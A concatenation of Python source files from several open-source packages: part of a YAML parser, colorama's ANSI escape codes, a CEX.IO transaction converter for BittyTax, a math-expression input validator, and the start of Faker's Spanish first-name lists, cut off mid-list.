if block:
node = 'block'
else:
node = 'flow'
token = self.peek_token()
raise ParserError("while parsing a %s node" % node, start_mark,
"expected the node content, but found %r" % token.id,
token.start_mark)
return event
# block_sequence ::= BLOCK-SEQUENCE-START (BLOCK-ENTRY block_node?)* BLOCK-END
def parse_block_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_sequence_entry()
def parse_block_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken, BlockEndToken):
self.states.append(self.parse_block_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_block_sequence_entry
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block collection", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
# indentless_sequence ::= (BLOCK-ENTRY block_node?)+
def parse_indentless_sequence_entry(self):
if self.check_token(BlockEntryToken):
token = self.get_token()
if not self.check_token(BlockEntryToken,
KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_indentless_sequence_entry)
return self.parse_block_node()
else:
self.state = self.parse_indentless_sequence_entry
return self.process_empty_scalar(token.end_mark)
token = self.peek_token()
event = SequenceEndEvent(token.start_mark, token.start_mark)
self.state = self.states.pop()
return event
# block_mapping ::= BLOCK-MAPPING_START
# ((KEY block_node_or_indentless_sequence?)?
# (VALUE block_node_or_indentless_sequence?)?)*
# BLOCK-END
def parse_block_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_block_mapping_key()
def parse_block_mapping_key(self):
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_value)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_value
return self.process_empty_scalar(token.end_mark)
if not self.check_token(BlockEndToken):
token = self.peek_token()
raise ParserError("while parsing a block mapping", self.marks[-1],
"expected <block end>, but found %r" % token.id, token.start_mark)
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_block_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(KeyToken, ValueToken, BlockEndToken):
self.states.append(self.parse_block_mapping_key)
return self.parse_block_node_or_indentless_sequence()
else:
self.state = self.parse_block_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_block_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
# flow_sequence ::= FLOW-SEQUENCE-START
# (flow_sequence_entry FLOW-ENTRY)*
# flow_sequence_entry?
# FLOW-SEQUENCE-END
# flow_sequence_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
#
# Note that while production rules for both flow_sequence_entry and
# flow_mapping_entry are equal, their interpretations are different.
# For `flow_sequence_entry`, the part `KEY flow_node? (VALUE flow_node?)?`
    # generates an inline mapping (set syntax).
def parse_flow_sequence_first_entry(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_sequence_entry(first=True)
def parse_flow_sequence_entry(self, first=False):
if not self.check_token(FlowSequenceEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow sequence", self.marks[-1],
"expected ',' or ']', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.peek_token()
event = MappingStartEvent(None, None, True,
token.start_mark, token.end_mark,
flow_style=True)
self.state = self.parse_flow_sequence_entry_mapping_key
return event
elif not self.check_token(FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry)
return self.parse_flow_node()
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_sequence_entry_mapping_key(self):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_value
return self.process_empty_scalar(token.end_mark)
def parse_flow_sequence_entry_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_end)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_end
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_sequence_entry_mapping_end
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_sequence_entry_mapping_end(self):
self.state = self.parse_flow_sequence_entry
token = self.peek_token()
return MappingEndEvent(token.start_mark, token.start_mark)
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
def parse_flow_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_mapping_key(first=True)
def parse_flow_mapping_key(self, first=False):
if not self.check_token(FlowMappingEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow mapping", self.marks[-1],
"expected ',' or '}', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_value
return self.process_empty_scalar(token.end_mark)
elif not self.check_token(FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_empty_value)
return self.parse_flow_node()
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_key)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_mapping_empty_value(self):
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(self.peek_token().start_mark)
def process_empty_scalar(self, mark):
        return ScalarEvent(None, None, (True, False), '', mark, mark)
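# Demo via upstream PyYAML (assumption: the 'yaml' package is installed).
# Combined with the Reader/Scanner mixins that provide the peek_token/
# check_token/get_token methods used above, this Parser produces the same
# event stream:
if __name__ == '__main__':
    import yaml
    for event in yaml.parse('a: [1, 2]'):
        print(event)  # StreamStartEvent, DocumentStartEvent, MappingStartEvent, ...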
/CustomPipeline-0.0.3-py3-none-any.whl/rplibs/colorama/ansi.py
CSI = '\033['
OSC = '\033]'
BEL = '\007'
def code_to_chars(code):
return CSI + str(code) + 'm'
def set_title(title):
return OSC + '2;' + title + BEL
def clear_screen(mode=2):
return CSI + str(mode) + 'J'
def clear_line(mode=2):
return CSI + str(mode) + 'K'
class AnsiCodes(object):
def __init__(self):
# the subclasses declare class attributes which are numbers.
# Upon instantiation we define instance attributes, which are the same
# as the class attributes but wrapped with the ANSI escape sequence
for name in dir(self):
if not name.startswith('_'):
value = getattr(self, name)
setattr(self, name, code_to_chars(value))
class AnsiCursor(object):
def UP(self, n=1):
return CSI + str(n) + 'A'
def DOWN(self, n=1):
return CSI + str(n) + 'B'
def FORWARD(self, n=1):
return CSI + str(n) + 'C'
def BACK(self, n=1):
return CSI + str(n) + 'D'
def POS(self, x=1, y=1):
return CSI + str(y) + ';' + str(x) + 'H'
class AnsiFore(AnsiCodes):
BLACK = 30
RED = 31
GREEN = 32
YELLOW = 33
BLUE = 34
MAGENTA = 35
CYAN = 36
WHITE = 37
RESET = 39
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 90
LIGHTRED_EX = 91
LIGHTGREEN_EX = 92
LIGHTYELLOW_EX = 93
LIGHTBLUE_EX = 94
LIGHTMAGENTA_EX = 95
LIGHTCYAN_EX = 96
LIGHTWHITE_EX = 97
class AnsiBack(AnsiCodes):
BLACK = 40
RED = 41
GREEN = 42
YELLOW = 43
BLUE = 44
MAGENTA = 45
CYAN = 46
WHITE = 47
RESET = 49
# These are fairly well supported, but not part of the standard.
LIGHTBLACK_EX = 100
LIGHTRED_EX = 101
LIGHTGREEN_EX = 102
LIGHTYELLOW_EX = 103
LIGHTBLUE_EX = 104
LIGHTMAGENTA_EX = 105
LIGHTCYAN_EX = 106
LIGHTWHITE_EX = 107
class AnsiStyle(AnsiCodes):
BRIGHT = 1
DIM = 2
NORMAL = 22
RESET_ALL = 0
Fore = AnsiFore()
Back = AnsiBack()
Style = AnsiStyle()
Cursor = AnsiCursor()
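# Usage sketch: the instances above expand the numeric codes into escape
# sequences, e.g. Fore.RED == '\033[31m'; on an ANSI-capable terminal:
if __name__ == '__main__':
    print(Fore.RED + 'error' + Fore.RESET)
    print(Style.BRIGHT + Back.BLUE + 'highlight' + Style.RESET_ALL)
    print(Cursor.POS(10, 5) + 'text at column 10, row 5')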
/BittyTax-0.5.1.tar.gz/BittyTax-0.5.1/src/bittytax/conv/parsers/cexio.py
import re
import sys
from decimal import ROUND_DOWN, Decimal
from colorama import Fore
from ...config import config
from ..dataparser import DataParser
from ..exceptions import DataRowError, UnexpectedContentError, UnexpectedTypeError
from ..out_record import TransactionOutRecord
WALLET = "CEX.IO"
def parse_cexio(data_rows, parser, **_kwargs):
tx_times = {}
for dr in data_rows:
if dr.row_dict["DateUTC"] in tx_times:
tx_times[dr.row_dict["DateUTC"]].append(dr)
else:
tx_times[dr.row_dict["DateUTC"]] = [dr]
for data_row in data_rows:
if config.debug:
sys.stderr.write(
"%sconv: row[%s] %s\n"
% (Fore.YELLOW, parser.in_header_row_num + data_row.line_num, data_row)
)
if data_row.parsed:
continue
try:
_parse_cexio_row(tx_times, parser, data_row)
except DataRowError as e:
data_row.failure = e
def _parse_cexio_row(tx_times, parser, data_row):
row_dict = data_row.row_dict
data_row.timestamp = DataParser.parse_timestamp(row_dict["DateUTC"])
if row_dict["FeeAmount"]:
fee_quantity = row_dict["FeeAmount"]
fee_asset = row_dict["FeeSymbol"]
else:
fee_quantity = None
fee_asset = ""
if row_dict["Type"] == "deposit":
if row_dict["Balance"] == "pending":
return
if row_dict["Comment"].endswith("Completed") or row_dict["Comment"].startswith("Confirmed"):
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_DEPOSIT,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "withdraw":
if fee_quantity:
sell_quantity = abs(Decimal(row_dict["Amount"])) - Decimal(fee_quantity)
else:
sell_quantity = abs(Decimal(row_dict["Amount"]))
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_WITHDRAWAL,
data_row.timestamp,
sell_quantity=sell_quantity,
sell_asset=row_dict["Symbol"],
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] in ("buy", "sell"):
trade_info = _get_trade_info(row_dict["Comment"], row_dict["Type"])
if trade_info is None:
raise UnexpectedContentError(
parser.in_header.index("Comment"), "Comment", row_dict["Comment"]
)
if trade_info[0] == "Bought":
buy_quantity = row_dict["Amount"]
buy_asset = row_dict["Symbol"]
sell_quantity = Decimal(trade_info[1]) * Decimal(trade_info[3])
sell_asset = trade_info[4]
if sell_asset in config.fiat_list:
sell_quantity = sell_quantity.quantize(Decimal("0.00"), ROUND_DOWN)
elif trade_info[0] == "Sold":
if fee_quantity:
buy_quantity = Decimal(row_dict["Amount"]) + Decimal(fee_quantity)
else:
buy_quantity = Decimal(row_dict["Amount"])
buy_asset = row_dict["Symbol"]
sell_quantity = trade_info[1]
sell_asset = trade_info[2]
else:
# Skip corresponding "Buy/Sell Order" row
return
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_TRADE,
data_row.timestamp,
buy_quantity=buy_quantity,
buy_asset=buy_asset,
sell_quantity=sell_quantity,
sell_asset=sell_asset,
fee_quantity=fee_quantity,
fee_asset=fee_asset,
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] in ("wallet_buy", "wallet_sell"):
_make_trade(tx_times[row_dict["DateUTC"]], data_row, parser)
elif row_dict["Type"] in ("referral", "checksum", "costsNothing"):
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_GIFT_RECEIVED,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "staking":
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_STAKING,
data_row.timestamp,
buy_quantity=row_dict["Amount"],
buy_asset=row_dict["Symbol"],
wallet=WALLET,
note=row_dict["Comment"],
)
elif row_dict["Type"] == "cancel":
# Skip
return
else:
raise UnexpectedTypeError(parser.in_header.index("Type"), "Type", row_dict["Type"])
def _get_trade_info(comment, t_type):
if t_type == "buy":
match = re.match(
r"^(Bought) (\d+|\d+\.\d+) (\w+) at (\d+|\d+\.\d+) (\w+)$|^Buy Order.*$",
comment,
)
elif t_type == "sell":
match = re.match(
r"^(Sold) (\d+|\d+\.\d+) (\w+) at (\d+|\d+\.\d+) (\w+)$|^Sell Order.*$",
comment,
)
else:
return None
if match:
return match.groups()
return None
def _make_trade(tx_times, data_row, parser):
buy_rows = [dr for dr in tx_times if dr.row_dict["Type"] == "wallet_buy"]
sell_rows = [dr for dr in tx_times if dr.row_dict["Type"] == "wallet_sell"]
if len(buy_rows) == 1 and len(sell_rows) == 1:
if data_row == buy_rows[0]:
sell_rows[0].timestamp = data_row.timestamp
sell_rows[0].parsed = True
else:
buy_rows[0].timestamp = data_row.timestamp
buy_rows[0].parsed = True
# Assumes there are no trading fees
data_row.t_record = TransactionOutRecord(
TransactionOutRecord.TYPE_TRADE,
data_row.timestamp,
buy_quantity=buy_rows[0].row_dict["Amount"],
buy_asset=buy_rows[0].row_dict["Symbol"],
sell_quantity=abs(Decimal(sell_rows[0].row_dict["Amount"])),
sell_asset=sell_rows[0].row_dict["Symbol"],
wallet=WALLET,
)
else:
data_row.failure = UnexpectedContentError(
parser.in_header.index("Type"), "Type", data_row.row_dict["Type"]
)
DataParser(
DataParser.TYPE_EXCHANGE,
"CEX.IO",
[
"DateUTC",
"Amount",
"Symbol",
"Balance",
"Type",
"Pair",
"FeeSymbol",
"FeeAmount",
"Comment",
],
worksheet_name="CEX.IO",
all_handler=parse_cexio,
)
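# Sketch of the Comment formats _get_trade_info() accepts (hypothetical values):
if __name__ == '__main__':
    print(_get_trade_info('Bought 0.5 BTC at 20000 GBP', 'buy'))
    # -> ('Bought', '0.5', 'BTC', '20000', 'GBP')
    print(_get_trade_info('Sell Order #123', 'sell'))
    # -> (None, None, None, None, None)  (order rows are skipped by the caller)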
/OPML_Methods-0.1.14.tar.gz/OPML_Methods-0.1.14/OPML_Methods/input_validation.py
import re
from typing import Optional
from sympy.parsing.sympy_parser import parse_expr
from sympy import sympify, exp, Symbol
ALLOWED_OPERATIONS = ['log', 'ln', 'factorial', 'sin', 'cos', 'tan', 'cot', 'pi', 'exp', 'sqrt', 'root', 'abs']
def check_expression(expression: str) -> str:
"""
Функция для проверки выражения на корректность. Принимает на вход строку с функцией
в аналитическом виде, возвращает строку. Функция обязательно должна быть
только от аргументов вида x1, x2, ..., xn.
Parameters:
------------
expression: str
Строка содержащая функцию для проверки.
Returns:
-------
str: str
Функция в виде строки.
"""
expression = expression.strip()
if expression.find('—') != -1:
expression = expression.replace('—', '-')
if expression.find('–') != -1:
expression = expression.replace('–', '-')
    checker = compile(expression, '<string>', 'eval')  # may raise SyntaxError if the expression is invalid
var_checker = re.compile(r'^x{1}[0-9]+$')
for name in checker.co_names:
if name not in ALLOWED_OPERATIONS:
if not (var_checker.match(name) and name != 'x0'):
raise NameError(f"The use of '{name}' is not allowed")
function = sympify(expression, {'e': exp(1)}, convert_xor=True)
return str(function)
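# Example (hypothetical input): check_expression('x1^2 + sin(x2)')
# returns 'x1**2 + sin(x2)' ('^' is converted to '**' via convert_xor).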
def check_restr(restr_str: str, method: str, splitter: Optional[str] = ';') -> str:
"""
Проверяет корректность и читаемость ограничений.
Parameters
----------
restr_str: str
Строка с ограничениями в аналитическом виде.
method: str
Название метода для решения задачи.
splitter: Optional[str] = ';'
Строка-разделитель, которым разделены градиенты.
Returns
-------
restrs: str
Строка с ограничениями в аналитическом виде, разделенные ';'.
"""
g = restr_str.split(splitter)
ans = []
for i in range(len(g)):
if method == 'Newton':
if g[i].find('<=') != -1 or g[i].find('>=') != -1:
                raise ValueError(f'For method {method} the constraints must be equalities.')
else:
if g[i].count('=') != 1:
                    raise ValueError(f'Invalid constraint: {g[i]}')
left, right = g[i].split('=')
left, right = sympify(check_expression(left)), sympify(check_expression(right))
left = left - right
right = right - right
checked = str(left) + '=' + str(right)
ans.append(checked)
if method == 'primal-dual':
if g[i].count('=') > 1:
                raise ValueError(f'Invalid constraint: {g[i]}')
if g[i].find('>=') != -1:
splitt = '>='
elif g[i].find('<=') != -1:
splitt = '<='
else:
                raise ValueError(f'Invalid constraint: {g[i]}')
left, right = g[i].split(splitt)
left, right = sympify(check_expression(left)), sympify(check_expression(right))
if splitt == '>=':
left -= right
if splitt == '<=':
left = -left
right = -right
left -= right
right -= right
checked = str(left) + '>=' + str(right)
ans.append(checked)
if method == 'log_barrier':
if g[i].find('<=') != -1 or g[i].find('>=') != -1:
if g[i].count('=') > 1:
                    raise ValueError(f'Invalid constraint: {g[i]}')
if g[i].find('>=') != -1:
splitt = '>='
elif g[i].find('<=') != -1:
splitt = '<='
left, right = g[i].split(splitt)
left, right = sympify(check_expression(left)), sympify(check_expression(right))
if splitt == '>=':
left -= right
if splitt == '<=':
left = -left
right = -right
left -= right
right -= right
checked = str(left) + '>=' + str(right)
ans.append(checked)
else:
                raise ValueError(f'''Equality constraints are not yet supported
                for method {method}; support can be added.''')
            # if g[i].count('=') != 1:
            #     raise ValueError(f'Invalid constraint: {g[i]}')
    # print(ans)
restrs = ";".join(ans)
return restrs
def check_float(value: str) -> float:
"""
Проверяет введеное значение на корректность и на наличие инъекций, а затем
конвертирует в float, если это возможно. Поддерживает операции с pi и e.
Parameters:
------------
values: str
строка в которой содержится выражение
Returns:
-------
float
значение переведенное из строки в float
"""
value = value.strip()
if value.find('^') != -1:
value = value.replace('^', '**')
    checker = compile(value, '<string>', 'eval')  # may raise SyntaxError if the expression is invalid
for name in checker.co_names:
if name not in ['pi', 'e', 'exp']:
            raise ValueError(f'The name {name} is not allowed')
value = float(parse_expr(value, {'e': exp(1)}))
return value
def check_point(point_str: str, function: str, restrs: str, method: str, splitter: Optional[str] = ';') -> str:
"""
Функция проверяет корректность введеной точки x0.
Parameters
----------
point_str: str
Координаты точки в виде строки. Если строка пустая или 'None', то будет применяться метод первой фазы.
function: str
Функция минимизации. Нужна для проверки корректности точки и размерностей.
restrs: str
Строка ограничений. Нужна для проверки размерности точки и для проверки точки на внутренность.
method: str
Название метода для решения задачи.
splitter: Optional[str] = ';'
Разделитель, которым разделены координаты в строке.
Returns
-------
point: str
Строка с координатами точки, разделенные знаком ';'.
"""
if point_str == '' or point_str == 'None':
return ''
coords = point_str.split(splitter)
for i in range(len(coords)):
coords[i] = str(check_float(coords[i]))
f = sympify(function)
if method == 'Newton':
r = [sympify(i.split('=')[0]) for i in restrs.split(';')]
elif method == 'primal-dual':
r = [sympify(i.split('>=')[0]) if i.find('>=') != -1 else sympify(i.split('<=')[0]) for i in restrs.split(';')]
elif method == 'log_barrier':
r = [sympify(i.split('>=')[0]) if i.find('>=') != -1 else sympify(i.split('<=')[0]) for i in restrs.split(';')]
max_ind = 0
for i in [f]+r:
i = max([int(str(j)[1:]) for j in i.free_symbols])
max_ind = max(max_ind, i)
if max_ind != len(coords):
        raise ValueError("The point's dimension does not match the dimensions of the problem's functions")
d = {f'x{i+1}': float(coords[i]) for i in range(len(coords))}
if method == 'primal-dual':
for i in r:
# print(i.subs(d), i)
if float(i.subs(d)) <= 0:
                raise ValueError('The point is not interior')
if method == 'log_barrier':
for i in r:
# print(i.subs(d), i)
if float(i.subs(d)) <= 0:
                raise ValueError('The point is not interior')
points = ';'.join(coords)
return points
if __name__ == '__main__':
    func = 'x1**2 - x3'
    restr = 'x2 - x4 >= 3'
    meth = 'log_barrier'
    start = '0;4;0;0'
    # skeleton of the checks
    s = check_expression(func)
    # print(s)
    r = check_restr(restr, method=meth)
    # print(r)
    p = check_point(start, s, r, meth)
    # print(p)
/Faker-19.3.1.tar.gz/Faker-19.3.1/faker/providers/person/es_ES/__init__.py
from typing import Tuple
from ..es import Provider as PersonProvider
class Provider(PersonProvider):
formats_male: Tuple[str, ...] = (
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}}",
"{{first_name_male}} {{prefix}} {{last_name}}",
"{{first_name_male}} {{last_name}}-{{last_name}}",
"{{first_name_male}} {{first_name_male}} {{last_name}} {{last_name}}",
)
formats_female: Tuple[str, ...] = (
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}}",
"{{first_name_female}} {{prefix}} {{last_name}}",
"{{first_name_female}} {{last_name}}-{{last_name}}",
"{{first_name_female}} {{first_name_female}} {{last_name}} {{last_name}}",
)
formats: Tuple[str, ...] = formats_male + formats_female
# 477 male first names, alphabetically.
# Source: Álvaro Mondéjar Rubio <[email protected]>
first_names_male: Tuple[str, ...] = (
"Aarón",
"Abel",
"Abilio",
"Abraham",
"Adalberto",
"Adelardo",
"Adolfo",
"Adrián",
"Adán",
"Agapito",
"Agustín",
"Aitor",
"Albano",
"Albert",
"Alberto",
"Albino",
"Alcides",
"Ale",
"Alejandro",
"Alejo",
"Alex",
"Alfonso",
"Alfredo",
"Alonso",
"Amado",
"Amador",
"Amancio",
"Amando",
"Amaro",
"Ambrosio",
"Amor",
"Américo",
"Amílcar",
"Anacleto",
"Anastasio",
"Andrés",
"Andrés Felipe",
"Angelino",
"Anselmo",
"Antonio",
"Aníbal",
"Apolinar",
"Ariel",
"Aristides",
"Armando",
"Arsenio",
"Artemio",
"Arturo",
"Asdrubal",
"Atilio",
"Augusto",
"Aureliano",
"Aurelio",
"Baldomero",
"Balduino",
"Baltasar",
"Bartolomé",
"Basilio",
"Baudelio",
"Bautista",
"Benigno",
"Benito",
"Benjamín",
"Bernabé",
"Bernardino",
"Bernardo",
"Berto",
"Blas",
"Bonifacio",
"Borja",
"Bruno",
"Buenaventura",
"Calisto",
"Calixto",
"Camilo",
"Candelario",
"Carlito",
"Carlos",
"Carmelo",
"Casemiro",
"Cayetano",
"Cebrián",
"Cecilio",
"Ceferino",
"Celestino",
"Celso",
"Cesar",
"Che",
"Chema",
"Chucho",
"Chus",
"Chuy",
"Cipriano",
"Ciriaco",
"Cirino",
"Ciro",
"Ciríaco",
"Claudio",
"Clemente",
"Cleto",
"Clímaco",
"Conrado",
"Cornelio",
"Cosme",
"Cristian",
"Cristian",
"Cristóbal",
"Cruz",
"Curro",
"Custodio",
"Cándido",
"César",
"Damián",
"Dan",
"Dani",
"Daniel",
"Danilo",
"Darío",
"David",
"Demetrio",
"Desiderio",
"Diego",
"Dimas",
"Dionisio",
"Domingo",
"Donato",
"Duilio",
"Edelmiro",
"Edgardo",
"Edmundo",
"Edu",
"Eduardo",
"Efraín",
"Eladio",
"Eleuterio",
"Eligio",
"Eliseo",
"Eloy",
"Elpidio",
"Elías",
"Emigdio",
"Emiliano",
"Emilio",
"Enrique",
"Epifanio",
"Erasmo",
"Eric",
"Ernesto",
"Espiridión",
"Esteban",
"Eugenio",
"Eusebio",
"Eustaquio",
"Eutimio",
"Eutropio",
"Evaristo",
"Ezequiel",
"Fabio",
"Fabián",
"Fabricio",
"Faustino",
"Fausto",
"Federico",
"Feliciano",
"Felipe",
"Felix",
"Fermín",
"Fernando",
"Fidel",
"Fito",
"Flavio",
"Florencio",
"Florentino",
"Fortunato",
"Francisco",
"Francisco Javier",
"Francisco Jose",
"Fulgencio",
"Félix",
"Gabino",
"Gabriel",
"Galo",
"Gaspar",
"Gastón",
"Geraldo",
"Gerardo",
"Germán",
"Gervasio",
"Gerónimo",
"Gil",
"Gilberto",
"Glauco",
"Godofredo",
"Gonzalo",
"Goyo",
"Graciano",
"Gregorio",
"Guadalupe",
"Guillermo",
"Guiomar",
"Gustavo",
"Haroldo",
"Hector",
"Heliodoro",
"Heraclio",
"Herberto",
"Heriberto",
"Hermenegildo",
"Herminio",
"Hernando",
"Hernán",
"Hilario",
"Hipólito",
"Horacio",
"Hugo",
"Humberto",
"Héctor",
"Ibán",
"Ignacio",
"Iker",
"Ildefonso",
"Inocencio",
"Isaac",
"Isaías",
"Isidoro",
"Isidro",
"Ismael",
"Iván",
"Jacinto",
"Jacobo",
"Jafet",
"Jaime",
"Javi",
"Javier",
"Jenaro",
"Jeremías",
"Jerónimo",
"Jesús",
"Joan",
"Joaquín",
"Joel",
"Jonatan",
"Jordi",
"Jordán",
"Jorge",
"Jose",
"Jose Angel",
"Jose Antonio",
"Jose Carlos",
"Jose Francisco",
"Jose Ignacio",
"Jose Luis",
"Jose Manuel",
"Jose Miguel",
"Jose Ramón",
"Josep",
"Josué",
"José",
"José Antonio",
"José Luis",
"José Manuel",
"José Mari",
"José María",
"José Ángel",
"Juan",
"Juan Antonio",
"Juan Bautista",
"Juan Carlos",
"Juan Francisco",
"Juan José",
"Juan Luis",
"Juan Manuel",
"Juan Pablo",
"Juanito",
"Julio",
"Julio César",
"Julián",
"Kike",
"Lalo",
"Leandro",
"Leocadio",
"Leonardo",
"Leoncio",
"Leonel",
"Leopoldo",
"León",
"Lino",
"Lisandro",
"Lope",
"Lorenzo",
"Loreto",
"Lucas",
"Lucho",
"Luciano",
"Lucio",
"Luis",
"Luis Miguel",
"Luis Ángel",
"Lupe",
"Luís",
"Lázaro",
"Macario",
"Manolo",
"Manu",
"Manuel",
"Marc",
"Marcelino",
"Marcelo",
"Marcial",
"Marciano",
"Marcio",
"Marco",
"Marcos",
"Mariano",
"Marino",
"Mario",
"Martin",
"Martín",
"María",
"Mateo",
"Matías",
"Mauricio",
"Maxi",
"Maximiano",
"Maximiliano",
"Maximino",
"Melchor",
"Miguel",
"Miguel Ángel",
"Modesto",
"Mohamed",
"Moisés",
"Moreno",
"Máximo",
"Nacho",
"Nacio",
"Nando",
"Narciso",
"Natalio",
"Natanael",
"Nazaret",
"Nazario",
"Nicanor",
"Nico",
"Nicodemo",
"Nicolás",
"Nilo",
"Norberto",
"Noé",
"Néstor",
"Octavio",
"Olegario",
"Omar",
"Onofre",
"Osvaldo",
"Ovidio",
"Pablo",
"Paco",
"Pancho",
"Pascual",
"Pastor",
"Patricio",
"Paulino",
"Pedro",
"Pelayo",
"Pepe",
"Pepito",
"Plinio",
"Plácido",
"Poncio",
"Porfirio",
"Primitivo",
"Prudencio",
"Pánfilo",
"Pío",
"Quique",
"Quirino",
"Rafa",
"Rafael",
"Raimundo",
"Ramiro",
"Ramón",
"Raúl",
"Reinaldo",
"Remigio",
"Renato",
"René",
"Reyes",
"Reynaldo",
"Ricardo",
"Rico",
"Roberto",
"Rodolfo",
"Rodrigo",
"Rogelio",
"Rolando",
"Roldán",
"Román",
"Roque",
"Rosario",
"Rosendo",
"Ruben",
"Rubén",
"Rufino",
"Ruperto",
"Ruy",
"Régulo",
"Rómulo",
"Sabas",
"Salomón",
"Salvador",
"Samu",
"Samuel",
"Sancho",
"Sandalio",
"Santiago",
"Santos",
"Saturnino",
"Sebastian",
"Sebastián",
"Segismundo",
"Sergio",
"Seve",
"Severiano",
"Severino",
"Severo",
"Sigfrido",
"Silvestre",
"Silvio",
"Simón",
"Sosimo",
"Tadeo",
"Telmo",
"Teo",
"Teobaldo",
"Teodoro",
"Teodosio",
"Teófilo",
"Tiburcio",
"Timoteo",
"Tito",
"Tomás",
"Toni",
"Toribio",
"Toño",
"Trinidad",
"Tristán",
"Ulises",
"Urbano",
"Valentín",
"Valerio",
"Valero",
"Vasco",
"Venceslás",
"Vicente",
"Victor",
"Victor Manuel",
"Victoriano",
"Victorino",
"Vidal",
"Vinicio",
"Virgilio",
"Vito",
"Víctor",
"Wilfredo",
"Wálter",
"Xavier",
"Yago",
"Zacarías",
"Álvaro",
"Ángel",
"Édgar",
"Íñigo",
"Óscar",
)
# 477 female first names, alphabetically.
# Source: Álvaro Mondéjar Rubio <[email protected]>
first_names_female: Tuple[str, ...] = (
"Abigaíl",
"Abril",
"Adela",
"Adelaida",
"Adelia",
"Adelina",
"Adora",
"Adoración",
"Adriana",
"Agustina",
"Ainara",
"Ainoa",
"Aitana",
"Alba",
"Albina",
"Ale",
"Alejandra",
"Alexandra",
"Alicia",
"Alma",
"Almudena",
"Alondra",
"Amada",
"Amalia",
"Amanda",
"Amarilis",
